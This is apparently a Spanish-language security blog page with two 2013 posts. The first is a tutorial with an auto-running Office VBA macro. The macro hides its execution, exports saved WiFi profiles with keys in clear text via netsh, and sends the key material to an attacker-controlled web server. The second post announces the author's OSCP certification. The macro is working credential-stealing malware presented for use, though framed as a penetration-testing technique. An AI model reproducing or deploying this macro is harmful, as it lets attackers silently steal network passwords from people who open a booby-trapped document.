sábado, 23 de febrero de 2013

Como obtener clave de WiFI (WEP - WPA2) a traves de macros

Cuando se verifica la seguridad de la infraestructura de red inalambrica (WiFi), se suelen realizar pruebas sobre la configuracion de seguridad de la red y la fortaleza del protocolo utilizado, a continuacion un vector de ataque adicional: un ataque a los clientes de dicha red, robando sus credenciales.

Muchos ya conoceran las herramientas de Nirsoft para la recuperacion de passwords, la idea con esta prueba es la misma, obtener la clave almacenada en el registro para luego ser enviada a un determinado sitio (bajo ciertas condiciones).

Para ello existe un comando muy util que nos permitira obtener las claves desde el registro:

netsh wlan export profile folder=. key=clear

Podemos cargar dicha clave en una macro de office para su ejecucion, enviando el resultado a un servidor web bajo nuestro poder:

Sub Auto_open()
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile("mw.bat", True)
    a.writeline "@echo off"
    a.writeline "@netsh wlan export profile folder=. key=clear"
    a.writeline "@for /f ""delims="" %%i in ('find ""keyMaterial"" *.xml') do set contenido=""%%i"""
    a.writeline "@start http://200.XXX.XXX.XXX/?%contenido%"
    Call Shell(Environ$("COMSPEC") & " /c mw.bat", vbHide)
End Sub

Cuando el objetivo ejecute el macro, enviara automaticamente los datos obtenidos hacia el sitio web, en los cuales se encontrará la clave en texto claro, si esta no tiene el parámetro "protected=true" en la configuracion del XML, para mayor informacion acerca de este ultimo punto vean este sitio.

Saludos

Boris

domingo, 17 de febrero de 2013

Obtuve el OSCP (Offensive Security Certified Professional)


Offensive Security es la empresa que se encuentra detras de la distribucion Backtrack (pronto Kali?), la cual se concentra justamente en el uso de esta distribucion, conjuntamente con la metodologia y herramientas necesarias para realizar un penetration test, se diferencia de otras certificaciones de hacking en que el curso se lleva a cabo con acceso remoto a un laboratorio que simula distintos entornos y vulnerabilidades y la certificacion se la gana con un examen en otro entorno de laboratorio, donde se debe acceder (hackear) a un conjunto de equipos para obtener la calificacion necesaria para certificarse, lo cual la hace una certificacion muy respetada en el entorno de profesionales de seguridad especializados en Ethical Hacking.

Realmente es un curso muy recomendable en cuanto a material y en general al espiritu del curso que se centra en lo que realiza un pen tester: la investigacion bajo el lema de "Try Harder", este curso me permitio mejorar las habilidades relacionadas con el hacking, de tal modo que la semana pasada tomé el examen de certificacion (24 horas de examen + 24 horas para la entrega de un informe), y 3 dias despues recibí la noticia: obtuve la certificacion OSCP.

Para mayor informacion al respecto pueden visitar el sitio de Offensive Security.


Boris